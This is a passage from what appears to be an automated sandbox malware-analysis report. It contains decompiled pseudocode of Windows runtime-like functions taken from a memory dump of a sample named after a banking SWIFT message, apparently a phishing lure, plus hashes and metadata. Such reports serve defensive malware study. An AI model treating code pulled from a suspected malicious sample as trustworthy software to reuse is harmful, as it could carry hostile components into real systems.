                                                                    									_v24 =  *( *[fs:0x18] + 0x24);
                                                                    									_v16 = 3;
                                                                    									_v28 = 0;
                                                                    									__eflags = _t231 & 0x00000002;
                                                                    									if((_t231 & 0x00000002) == 0) {
                                                                    										_v32 =  &_v36;
                                                                    										_t174 = _t231 >> 4;
                                                                    										__eflags = 1 - _t174;
                                                                    										_v20 = _t174;
                                                                    										asm("sbb ecx, ecx");
                                                                    										_t210 = 3 |  &_v36;
                                                                    										__eflags = _t174;
                                                                    										if(_t174 == 0) {
                                                                    											_v20 = 0xfffffffe;
                                                                    										}
                                                                    									} else {
                                                                    										_v32 = 0;
                                                                    										_v20 = 0xffffffff;
                                                                    										_v36 = _t231 & 0xfffffff0;
                                                                    										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
                                                                    										_v72 =  !(_t231 >> 2) & 0xffffff01;
                                                                    									}
                                                                    									asm("lock cmpxchg [edi], esi");
                                                                    									_t262 = _t231;
                                                                    									__eflags = _t262 - _t231;
                                                                    									if(_t262 != _t231) {
                                                                    										goto L92;
                                                                    									} else {
                                                                    										__eflags = _v72;
                                                                    										if(_v72 != 0) {
                                                                    											E018D006A(0x1988608, _t210);
                                                                    										}
                                                                    										__eflags =  *0x7ffe036a - 1;
                                                                    										if(__eflags <= 0) {
                                                                    											L89:
                                                                    											_t133 =  &_v16;
                                                                    											asm("lock btr dword [eax], 0x1");
                                                                    											if(__eflags >= 0) {
                                                                    												goto L93;
                                                                    											} else {
                                                                    												goto L90;
                                                                    											}
                                                                    											do {
                                                                    												L90:
                                                                    												_push(0);
                                                                    												_push(0x1988608);
                                                                    												E018DB180();
                                                                    												_t133 = _v24;
                                                                    												__eflags = _t133 & 0x00000004;
                                                                    											} while ((_t133 & 0x00000004) == 0);
                                                                    											goto L93;
                                                                    										} else {
                                                                    											_t218 =  *0x1986904; // 0x400
                                                                    											__eflags = _t218;
                                                                    											if(__eflags == 0) {
                                                                    												goto L89;
                                                                    											} else {
                                                                    												goto L87;
                                                                    											}
                                                                    											while(1) {
                                                                    												L87:
                                                                    												__eflags = _v16 & 0x00000002;
                                                                    												if(__eflags == 0) {
                                                                    													goto L89;
                                                                    												}
                                                                    												asm("pause");
                                                                    												_t218 = _t218 - 1;
                                                                    												__eflags = _t218;
                                                                    												if(__eflags != 0) {
                                                                    													continue;
                                                                    												}
                                                                    												goto L89;
                                                                    											}
                                                                    											goto L89;
                                                                    										}
                                                                    									}
                                                                    								}
                                                                    							}
                                                                    							L10:
                                                                    							_t229 =  *0x1986e48; // 0x0
                                                                    							_v72 = _t229;
                                                                    							if(_t229 == 0 ||  *((char*)(_t229 + 0x40)) == 0 &&  *((intOrPtr*)(_t229 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
                                                                    								E018AFFB0(_t198, _t240, 0x1988608);
                                                                    								_t253 = _v76;
                                                                    								goto L29;
                                                                    							} else {
                                                                    								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
                                                                    								asm("lock cmpxchg [esi], ecx");
                                                                    								_t215 = 1;
                                                                    								if(1 != 1) {
                                                                    									while(1) {
                                                                    										_t246 = _t215 & 0x00000006;
                                                                    										_t180 = _t215;
                                                                    										__eflags = _t246 - 2;
                                                                    										_v56 = _t246;
                                                                    										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
                                                                    										asm("lock cmpxchg [edi], esi");
                                                                    										_t248 = _v56;
                                                                    										__eflags = _t180 - _t215;
                                                                    										if(_t180 == _t215) {
                                                                    											break;
                                                                    										}
                                                                    										_t215 = _t180;
                                                                    									}
                                                                    									__eflags = _t248 - 2;
                                                                    									if(_t248 == 2) {
                                                                    										__eflags = 0;
                                                                    										E018D00C2(0x1988608, 0, _t235);
                                                                    									}
                                                                    									_t229 = _v72;
                                                                    								}
                                                                    								goto L14;
                                                                    							}
                                                                    						}
                                                                    					}
                                                                    				}
                                                                    				_t227 = 0;
                                                                    				_v75 = 0;
                                                                    				if(_t128 != 0) {
                                                                    					goto L4;
                                                                    				}
                                                                    				goto L2;
                                                                    			}











































































                                                                    0x018c20a0
                                                                    0x018c20a8
                                                                    0x018c20ad
                                                                    0x018c20b3
                                                                    0x018c20b8
                                                                    0x018c20c2
                                                                    0x018c20c7
                                                                    0x018c20cb
                                                                    0x018c20d2
                                                                    0x018c2263
                                                                    0x018c2266
                                                                    0x01905836
                                                                    0x01905836
                                                                    0x00000000
                                                                    0x018c226c
                                                                    0x018c226c
                                                                    0x018c2270
                                                                    0x018c2274
                                                                    0x018c20e2
                                                                    0x018c20e2
                                                                    0x018c20e6
                                                                    0x018c20ee
                                                                    0x019057dc
                                                                    0x019057de
                                                                    0x019057ec
                                                                    0x019057ec
                                                                    0x019057f1
                                                                    0x019057f3
                                                                    0x019057f8
                                                                    0x00000000
                                                                    0x019057f8
                                                                    0x019057e0
                                                                    0x019057e4
                                                                    0x019057ea
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x019057ea
                                                                    0x018c20f4
                                                                    0x018c20f4
                                                                    0x018c20f8
                                                                    0x018c20f8
                                                                    0x018c20fc
                                                                    0x018c2100
                                                                    0x018c2106
                                                                    0x018c2201
                                                                    0x018c2206
                                                                    0x018c220b
                                                                    0x018c220e
                                                                    0x018c22a9
                                                                    0x018c22ac
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x018c22b2
                                                                    0x018c22b5
                                                                    0x01905801
                                                                    0x01905806
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x01905810
                                                                    0x01905815
                                                                    0x01905818
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0190581e
                                                                    0x018c22bb
                                                                    0x018c22bb
                                                                    0x018c2218
                                                                    0x018c2218
                                                                    0x018c221c
                                                                    0x018c2220
                                                                    0x018c2222
                                                                    0x018c22c2
                                                                    0x018c22c4
                                                                    0x018c22dc
                                                                    0x018c22dc
                                                                    0x018c22e1
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x018c22e7
                                                                    0x018c22c8
                                                                    0x018c22cd
                                                                    0x018c22d3
                                                                    0x018c22d6
                                                                    0x01905823
                                                                    0x01905825
                                                                    0x01905827
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0190582d
                                                                    0x00000000
                                                                    0x0190582d
                                                                    0x00000000
                                                                    0x018c2228
                                                                    0x018c2228
                                                                    0x00000000
                                                                    0x018c2228
                                                                    0x018c2222
                                                                    0x018c2214
                                                                    0x018c2214
                                                                    0x00000000
                                                                    0x018c2114
                                                                    0x018c2114
                                                                    0x018c2114
                                                                    0x018c211a
                                                                    0x018c211c
                                                                    0x018c2348
                                                                    0x018c234d
                                                                    0x01905840
                                                                    0x01905845
                                                                    0x01905848
                                                                    0x0190584e
                                                                    0x0190584e
                                                                    0x01905848
                                                                    0x018c2353
                                                                    0x018c2355
                                                                    0x018c2388
                                                                    0x018c2388
                                                                    0x018c2368
                                                                    0x018c236a
                                                                    0x018c236c
                                                                    0x018c238f
                                                                    0x00000000
                                                                    0x018c236e
                                                                    0x018c236e
                                                                    0x018c218e
                                                                    0x018c218e
                                                                    0x018c2191
                                                                    0x018c2195
                                                                    0x01905a03
                                                                    0x01905a06
                                                                    0x01905a0c
                                                                    0x01905a0f
                                                                    0x01905a11
                                                                    0x01905a13
                                                                    0x01905a13
                                                                    0x01905a19
                                                                    0x01905a1f
                                                                    0x00000000
                                                                    0x018c219b
                                                                    0x018c219b
                                                                    0x018c21a0
                                                                    0x018c2282
                                                                    0x018c2284
                                                                    0x018c2284
                                                                    0x018c2284
                                                                    0x018c2284
                                                                    0x018c21a6
                                                                    0x018c21a9
                                                                    0x018c21ac
                                                                    0x018c21ae
                                                                    0x018c21b3
                                                                    0x018c228b
                                                                    0x018c2290
                                                                    0x018c2379
                                                                    0x018c2296
                                                                    0x018c2298
                                                                    0x018c2298
                                                                    0x018c2290
                                                                    0x018c21b9
                                                                    0x018c21be
                                                                    0x018c22a2
                                                                    0x018c22a2
                                                                    0x018c21c4
                                                                    0x018c21c8
                                                                    0x018c21cc
                                                                    0x018c21d0
                                                                    0x018c21d4
                                                                    0x018c21de
                                                                    0x018c21e3
                                                                    0x01905a29
                                                                    0x01905a2c
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x01905a3b
                                                                    0x00000000
                                                                    0x018c21e9
                                                                    0x018c21e9
                                                                    0x018c21e9
                                                                    0x018c21ee
                                                                    0x018c21f1
                                                                    0x01905a45
                                                                    0x01905a4b
                                                                    0x01905a52
                                                                    0x01905a58
                                                                    0x01905a5d
                                                                    0x01905a5f
                                                                    0x01905a71
                                                                    0x01905a61
                                                                    0x01905a6a
                                                                    0x01905a6a
                                                                    0x01905a76
                                                                    0x01905a79
                                                                    0x01905a7f
                                                                    0x01905a83
                                                                    0x01905a85
                                                                    0x01905a87
                                                                    0x01905a87
                                                                    0x01905a8c
                                                                    0x01905a91
                                                                    0x01905a97
                                                                    0x01905a9f
                                                                    0x01905aa0
                                                                    0x01905aa1
                                                                    0x01905aa6
                                                                    0x01905aab
                                                                    0x01905ab1
                                                                    0x01905ab3
                                                                    0x01905ab9
                                                                    0x01905aca
                                                                    0x01905ad4
                                                                    0x01905ad4
                                                                    0x01905ade
                                                                    0x01905ade
                                                                    0x01905aab
                                                                    0x01905a79
                                                                    0x01905a52
                                                                    0x018c21f7
                                                                    0x018c21f9
                                                                    0x018c21fe
                                                                    0x018c21fe
                                                                    0x018c21e3
                                                                    0x018c2195
                                                                    0x018c236c
                                                                    0x018c2122
                                                                    0x018c2122
                                                                    0x018c2124
                                                                    0x018c2231
                                                                    0x018c2236
                                                                    0x018c2236
                                                                    0x018c2238
                                                                    0x018c2238
                                                                    0x018c2240
                                                                    0x018c2242
                                                                    0x018c2244
                                                                    0x019059fc
                                                                    0x018c218c
                                                                    0x018c218c
                                                                    0x00000000
                                                                    0x018c218c
                                                                    0x018c224a
                                                                    0x018c224f
                                                                    0x018c2256
                                                                    0x018c2304
                                                                    0x018c2309
                                                                    0x018c230f
                                                                    0x018c231e
                                                                    0x018c231e
                                                                    0x018c231e
                                                                    0x018c2320
                                                                    0x018c2325
                                                                    0x018c232a
                                                                    0x018c232c
                                                                    0x018c233e
                                                                    0x018c233e
                                                                    0x00000000
                                                                    0x018c232c
                                                                    0x018c2311
                                                                    0x018c2317
                                                                    0x018c231a
                                                                    0x018c231c
                                                                    0x018c2380
                                                                    0x018c2380
                                                                    0x018c2380
                                                                    0x018c2384
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x018c2386
                                                                    0x00000000
                                                                    0x018c231c
                                                                    0x018c225c
                                                                    0x018c225c
                                                                    0x00000000
                                                                    0x018c225c
                                                                    0x018c212a
                                                                    0x018c2134
                                                                    0x018c2138
                                                                    0x018c213d
                                                                    0x01905858
                                                                    0x01905863
                                                                    0x01905863
                                                                    0x01905867
                                                                    0x0190586a
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0190586c
                                                                    0x0190586c
                                                                    0x01905871
                                                                    0x01905875
                                                                    0x01905877
                                                                    0x01905997
                                                                    0x0190599c
                                                                    0x019059a1
                                                                    0x019059a7
                                                                    0x019059a7
                                                                    0x00000000
                                                                    0x019059a7
                                                                    0x0190587d
                                                                    0x00000000
                                                                    0x0190588b
                                                                    0x0190588b
                                                                    0x01905890
                                                                    0x01905892
                                                                    0x01905894
                                                                    0x01905899
                                                                    0x0190589b
                                                                    0x019058a0
                                                                    0x019058a0
                                                                    0x019058aa
                                                                    0x019058b2
                                                                    0x019058b6
                                                                    0x019058be
                                                                    0x019058c6
                                                                    0x019058c9
                                                                    0x0190590d
                                                                    0x01905917
                                                                    0x0190591a
                                                                    0x0190591c
                                                                    0x01905920
                                                                    0x01905928
                                                                    0x0190592a
                                                                    0x0190592c
                                                                    0x0190592e
                                                                    0x0190592e
                                                                    0x019058cb
                                                                    0x019058cd
                                                                    0x019058d8
                                                                    0x019058e0
                                                                    0x019058f4
                                                                    0x019058fe
                                                                    0x019058fe
                                                                    0x0190593a
                                                                    0x0190593e
                                                                    0x01905940
                                                                    0x01905942
                                                                    0x00000000
                                                                    0x01905944
                                                                    0x01905944
                                                                    0x01905949
                                                                    0x0190594e
                                                                    0x0190594e
                                                                    0x01905953
                                                                    0x0190595b
                                                                    0x01905976
                                                                    0x01905976
                                                                    0x0190597a
                                                                    0x0190597f
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x01905981
                                                                    0x01905981
                                                                    0x01905981
                                                                    0x01905983
                                                                    0x01905988
                                                                    0x0190598d
                                                                    0x01905991
                                                                    0x01905991
                                                                    0x00000000
                                                                    0x0190595d
                                                                    0x0190595d
                                                                    0x01905963
                                                                    0x01905965
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x01905967
                                                                    0x01905967
                                                                    0x0190596b
                                                                    0x0190596d
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0190596f
                                                                    0x01905971
                                                                    0x01905971
                                                                    0x01905974
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x01905974
                                                                    0x00000000
                                                                    0x01905967
                                                                    0x0190595b
                                                                    0x01905942
                                                                    0x01905863
                                                                    0x018c2143
                                                                    0x018c2143
                                                                    0x018c2149
                                                                    0x018c214f
                                                                    0x018c22f1
                                                                    0x018c22f6
                                                                    0x00000000
                                                                    0x018c2173
                                                                    0x018c2173
                                                                    0x018c217d
                                                                    0x018c2181
                                                                    0x018c2186
                                                                    0x019059ae
                                                                    0x019059b2
                                                                    0x019059b5
                                                                    0x019059b7
                                                                    0x019059ba
                                                                    0x019059cd
                                                                    0x019059d1
                                                                    0x019059d5
                                                                    0x019059d9
                                                                    0x019059db
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x019059dd
                                                                    0x019059dd
                                                                    0x019059e1
                                                                    0x019059e4
                                                                    0x019059e7
                                                                    0x019059ee
                                                                    0x019059ee
                                                                    0x019059f3
                                                                    0x019059f3
                                                                    0x00000000
                                                                    0x018c2186
                                                                    0x018c214f
                                                                    0x018c2106
                                                                    0x018c2266
                                                                    0x018c20d8
                                                                    0x018c20da
                                                                    0x018c20e0
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 364454c1ad93720ad79a72d88ba919bc37108584a2cf85771306bee06a5abff7
                                                                    • Instruction ID: c12a71e52652ff100ddbde62495cee860d58e5f73358423831b490fbdef316a2
                                                                    • Opcode Fuzzy Hash: 364454c1ad93720ad79a72d88ba919bc37108584a2cf85771306bee06a5abff7
                                                                    • Instruction Fuzzy Hash: 38F1F4316083419FE726CB2CC44076ABBE7AFC5B24F05851EE999DB2D1D734DA41CB92
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 92%
                                                                    			E018A849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
                                                                    				void* _t136;
                                                                    				signed int _t139;
                                                                    				signed int _t141;
                                                                    				signed int _t145;
                                                                    				intOrPtr _t146;
                                                                    				signed int _t149;
                                                                    				signed int _t150;
                                                                    				signed int _t161;
                                                                    				signed int _t163;
                                                                    				signed int _t165;
                                                                    				signed int _t169;
                                                                    				signed int _t171;
                                                                    				signed int _t194;
                                                                    				signed int _t200;
                                                                    				void* _t201;
                                                                    				signed int _t204;
                                                                    				signed int _t206;
                                                                    				signed int _t210;
                                                                    				signed int _t214;
                                                                    				signed int _t215;
                                                                    				signed int _t218;
                                                                    				void* _t221;
                                                                    				signed int _t224;
                                                                    				signed int _t226;
                                                                    				intOrPtr _t228;
                                                                    				signed int _t232;
                                                                    				signed int _t233;
                                                                    				signed int _t234;
                                                                    				void* _t237;
                                                                    				void* _t238;
                                                                    
                                                                    				_t236 = __esi;
                                                                    				_t235 = __edi;
                                                                    				_t193 = __ebx;
                                                                    				_push(0x70);
                                                                    				_push(0x196f9c0);
                                                                    				E018ED0E8(__ebx, __edi, __esi);
                                                                    				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
                                                                    				if( *0x1987b04 == 0) {
                                                                    					L4:
                                                                    					goto L5;
                                                                    				} else {
                                                                    					_t136 = E018ACEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
                                                                    					_t236 = 0;
                                                                    					if(_t136 < 0) {
                                                                    						 *((intOrPtr*)(_t237 - 0x54)) = 0;
                                                                    					}
                                                                    					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
                                                                    						_t193 =  *( *[fs:0x30] + 0x18);
                                                                    						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
                                                                    						 *(_t237 - 0x68) = _t236;
                                                                    						 *(_t237 - 0x6c) = _t236;
                                                                    						_t235 = _t236;
                                                                    						 *(_t237 - 0x60) = _t236;
                                                                    						E018B2280( *[fs:0x30], 0x1988550);
                                                                    						_t139 =  *0x1987b04; // 0x1
                                                                    						__eflags = _t139 - 1;
                                                                    						if(__eflags != 0) {
                                                                    							_t200 = 0xc;
                                                                    							_t201 = _t237 - 0x40;
                                                                    							_t141 = E018CF3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
                                                                    							 *(_t237 - 0x44) = _t141;
                                                                    							__eflags = _t141;
                                                                    							if(_t141 < 0) {
                                                                    								L50:
                                                                    								E018AFFB0(_t193, _t235, 0x1988550);
                                                                    								L5:
                                                                    								return E018ED130(_t193, _t235, _t236);
                                                                    							}
                                                                    							_push(_t201);
                                                                    							_t221 = 0x10;
                                                                    							_t202 =  *(_t237 - 0x40);
                                                                    							_t145 = E01891C45( *(_t237 - 0x40), _t221);
                                                                    							 *(_t237 - 0x44) = _t145;
                                                                    							__eflags = _t145;
                                                                    							if(_t145 < 0) {
                                                                    								goto L50;
                                                                    							}
                                                                    							_t146 =  *0x1987b9c; // 0x0
                                                                    							_t235 = L018B4620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
                                                                    							 *(_t237 - 0x60) = _t235;
                                                                    							__eflags = _t235;
                                                                    							if(_t235 == 0) {
                                                                    								_t149 = 0xc0000017;
                                                                    								 *(_t237 - 0x44) = 0xc0000017;
                                                                    							} else {
                                                                    								_t149 =  *(_t237 - 0x44);
                                                                    							}
                                                                    							__eflags = _t149;
                                                                    							if(__eflags >= 0) {
                                                                    								L8:
                                                                    								 *(_t237 - 0x64) = _t235;
                                                                    								_t150 =  *0x1987b10; // 0x0
                                                                    								 *(_t237 - 0x4c) = _t150;
                                                                    								_push(_t237 - 0x74);
                                                                    								_push(_t237 - 0x39);
                                                                    								_push(_t237 - 0x58);
                                                                    								_t193 = E018CA61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
                                                                    								 *(_t237 - 0x44) = _t193;
                                                                    								__eflags = _t193;
                                                                    								if(_t193 < 0) {
                                                                    									L30:
                                                                    									E018AFFB0(_t193, _t235, 0x1988550);
                                                                    									__eflags = _t235 - _t237 - 0x38;
                                                                    									if(_t235 != _t237 - 0x38) {
                                                                    										_t235 =  *(_t237 - 0x48);
                                                                    										L018B77F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
                                                                    									} else {
                                                                    										_t235 =  *(_t237 - 0x48);
                                                                    									}
                                                                    									__eflags =  *(_t237 - 0x6c);
                                                                    									if( *(_t237 - 0x6c) != 0) {
                                                                    										L018B77F0(_t235, _t236,  *(_t237 - 0x6c));
                                                                    									}
                                                                    									__eflags = _t193;
                                                                    									if(_t193 >= 0) {
                                                                    										goto L4;
                                                                    									} else {
                                                                    										goto L5;
                                                                    									}
                                                                    								}
                                                                    								_t204 =  *0x1987b04; // 0x1
                                                                    								 *(_t235 + 8) = _t204;
                                                                    								__eflags =  *((char*)(_t237 - 0x39));
                                                                    								if( *((char*)(_t237 - 0x39)) != 0) {
                                                                    									 *(_t235 + 4) = 1;
                                                                    									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
                                                                    									_t161 =  *0x1987b10; // 0x0
                                                                    									 *(_t237 - 0x4c) = _t161;
                                                                    								} else {
                                                                    									 *(_t235 + 4) = _t236;
                                                                    									 *(_t235 + 0xc) =  *(_t237 - 0x58);
                                                                    								}
                                                                    								 *((intOrPtr*)(_t237 - 0x54)) = E018D37C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
                                                                    								_t224 = _t236;
                                                                    								 *(_t237 - 0x40) = _t236;
                                                                    								 *(_t237 - 0x50) = _t236;
                                                                    								while(1) {
                                                                    									_t163 =  *(_t235 + 8);
                                                                    									__eflags = _t224 - _t163;
                                                                    									if(_t224 >= _t163) {
                                                                    										break;
                                                                    									}
                                                                    									_t228 =  *0x1987b9c; // 0x0
                                                                    									_t214 = L018B4620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
                                                                    									 *(_t237 - 0x78) = _t214;
                                                                    									__eflags = _t214;
                                                                    									if(_t214 == 0) {
                                                                    										L52:
                                                                    										_t193 = 0xc0000017;
                                                                    										L19:
                                                                    										 *(_t237 - 0x44) = _t193;
                                                                    										L20:
                                                                    										_t206 =  *(_t237 - 0x40);
                                                                    										__eflags = _t206;
                                                                    										if(_t206 == 0) {
                                                                    											L26:
                                                                    											__eflags = _t193;
                                                                    											if(_t193 < 0) {
                                                                    												E018D37F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
                                                                    												__eflags =  *((char*)(_t237 - 0x39));
                                                                    												if( *((char*)(_t237 - 0x39)) != 0) {
                                                                    													 *0x1987b10 =  *0x1987b10 - 8;
                                                                    												}
                                                                    											} else {
                                                                    												_t169 =  *(_t237 - 0x68);
                                                                    												__eflags = _t169;
                                                                    												if(_t169 != 0) {
                                                                    													 *0x1987b04 =  *0x1987b04 - _t169;
                                                                    												}
                                                                    											}
                                                                    											__eflags = _t193;
                                                                    											if(_t193 >= 0) {
                                                                    												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
                                                                    											}
                                                                    											goto L30;
                                                                    										}
                                                                    										_t226 = _t206 * 0xc;
                                                                    										__eflags = _t226;
                                                                    										_t194 =  *(_t237 - 0x48);
                                                                    										do {
                                                                    											 *(_t237 - 0x40) = _t206 - 1;
                                                                    											_t226 = _t226 - 0xc;
                                                                    											 *(_t237 - 0x4c) = _t226;
                                                                    											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
                                                                    											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
                                                                    												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
                                                                    												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
                                                                    													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
                                                                    													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
                                                                    													__eflags =  *((char*)(_t237 - 0x39));
                                                                    													if( *((char*)(_t237 - 0x39)) == 0) {
                                                                    														_t171 = _t210;
                                                                    													} else {
                                                                    														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
                                                                    														L018B77F0(_t194, _t236, _t210 - 8);
                                                                    														_t171 =  *(_t237 - 0x50);
                                                                    													}
                                                                    													L48:
                                                                    													L018B77F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
                                                                    													L46:
                                                                    													_t206 =  *(_t237 - 0x40);
                                                                    													_t226 =  *(_t237 - 0x4c);
                                                                    													goto L24;
                                                                    												}
                                                                    												 *0x1987b08 =  *0x1987b08 + 1;
                                                                    												goto L24;
                                                                    											}
                                                                    											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
                                                                    											__eflags = _t171;
                                                                    											if(_t171 != 0) {
                                                                    												__eflags =  *((char*)(_t237 - 0x39));
                                                                    												if( *((char*)(_t237 - 0x39)) == 0) {
                                                                    													goto L48;
                                                                    												}
                                                                    												E018D57C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
                                                                    												goto L46;
                                                                    											}
                                                                    											L24:
                                                                    											__eflags = _t206;
                                                                    										} while (_t206 != 0);
                                                                    										_t193 =  *(_t237 - 0x44);
                                                                    										goto L26;
                                                                    									}
                                                                    									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
                                                                    									 *(_t237 - 0x7c) = _t232;
                                                                    									 *(_t232 - 4) = _t214;
                                                                    									 *(_t237 - 4) = _t236;
                                                                    									E018DF3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
                                                                    									_t238 = _t238 + 0xc;
                                                                    									 *(_t237 - 4) = 0xfffffffe;
                                                                    									_t215 =  *(_t237 - 0x48);
                                                                    									__eflags = _t193;
                                                                    									if(_t193 < 0) {
                                                                    										L018B77F0(_t215, _t236,  *(_t237 - 0x78));
                                                                    										goto L20;
                                                                    									}
                                                                    									__eflags =  *((char*)(_t237 - 0x39));
                                                                    									if( *((char*)(_t237 - 0x39)) != 0) {
                                                                    										_t233 = E018CA44B( *(_t237 - 0x4c));
                                                                    										 *(_t237 - 0x50) = _t233;
                                                                    										__eflags = _t233;
                                                                    										if(_t233 == 0) {
                                                                    											L018B77F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
                                                                    											goto L52;
                                                                    										}
                                                                    										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
                                                                    										L17:
                                                                    										_t234 =  *(_t237 - 0x40);
                                                                    										_t218 = _t234 * 0xc;
                                                                    										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
                                                                    										 *(_t218 + _t235 + 0x10) = _t236;
                                                                    										_t224 = _t234 + 1;
                                                                    										 *(_t237 - 0x40) = _t224;
                                                                    										 *(_t237 - 0x50) = _t224;
                                                                    										_t193 =  *(_t237 - 0x44);
                                                                    										continue;
                                                                    									}
                                                                    									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
                                                                    									goto L17;
                                                                    								}
                                                                    								 *_t235 = _t236;
                                                                    								_t165 = 0x10 + _t163 * 0xc;
                                                                    								__eflags = _t165;
                                                                    								_push(_t165);
                                                                    								_push(_t235);
                                                                    								_push(0x23);
                                                                    								_push(0xffffffff);
                                                                    								_t193 = E018D96C0();
                                                                    								goto L19;
                                                                    							} else {
                                                                    								goto L50;
                                                                    							}
                                                                    						}
                                                                    						_t235 = _t237 - 0x38;
                                                                    						 *(_t237 - 0x60) = _t235;
                                                                    						goto L8;
                                                                    					}
                                                                    					goto L4;
                                                                    				}
                                                                    			}

































                                                                    0x018a849b
                                                                    0x018a849b
                                                                    0x018a849b
                                                                    0x018a849b
                                                                    0x018a849d
                                                                    0x018a84a2
                                                                    0x018a84a7
                                                                    0x018a84b1
                                                                    0x018a84d8
                                                                    0x00000000
                                                                    0x018a84b3
                                                                    0x018a84c4
                                                                    0x018a84c9
                                                                    0x018a84cd
                                                                    0x018a84cf
                                                                    0x018a84cf
                                                                    0x018a84d6
                                                                    0x018a84e6
                                                                    0x018a84e9
                                                                    0x018a84ec
                                                                    0x018a84ef
                                                                    0x018a84f2
                                                                    0x018a84f4
                                                                    0x018a84fc
                                                                    0x018a8501
                                                                    0x018a8506
                                                                    0x018a8509
                                                                    0x018a86e0
                                                                    0x018a86e5
                                                                    0x018a86e8
                                                                    0x018a86ed
                                                                    0x018a86f0
                                                                    0x018a86f2
                                                                    0x018f9afd
                                                                    0x018f9b02
                                                                    0x018a84da
                                                                    0x018a84df
                                                                    0x018a84df
                                                                    0x018a86fa
                                                                    0x018a86fd
                                                                    0x018a86fe
                                                                    0x018a8701
                                                                    0x018a8706
                                                                    0x018a8709
                                                                    0x018a870b
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x018a8711
                                                                    0x018a8725
                                                                    0x018a8727
                                                                    0x018a872a
                                                                    0x018a872c
                                                                    0x018f9af0
                                                                    0x018f9af5
                                                                    0x018a8732
                                                                    0x018a8732
                                                                    0x018a8732
                                                                    0x018a8735
                                                                    0x018a8737
                                                                    0x018a8515
                                                                    0x018a8515
                                                                    0x018a8518
                                                                    0x018a851d
                                                                    0x018a8523
                                                                    0x018a8527
                                                                    0x018a852b
                                                                    0x018a8537
                                                                    0x018a8539
                                                                    0x018a853c
                                                                    0x018a853e
                                                                    0x018a868c
                                                                    0x018a8691
                                                                    0x018a8699
                                                                    0x018a869b
                                                                    0x018a8744
                                                                    0x018a8748
                                                                    0x018a86a1
                                                                    0x018a86a1
                                                                    0x018a86a1
                                                                    0x018a86a4
                                                                    0x018a86a8
                                                                    0x018f9bdf
                                                                    0x018f9bdf
                                                                    0x018a86ae
                                                                    0x018a86b0
                                                                    0x00000000
                                                                    0x018a86b6
                                                                    0x00000000
                                                                    0x018f9be9
                                                                    0x018a86b0
                                                                    0x018a8544
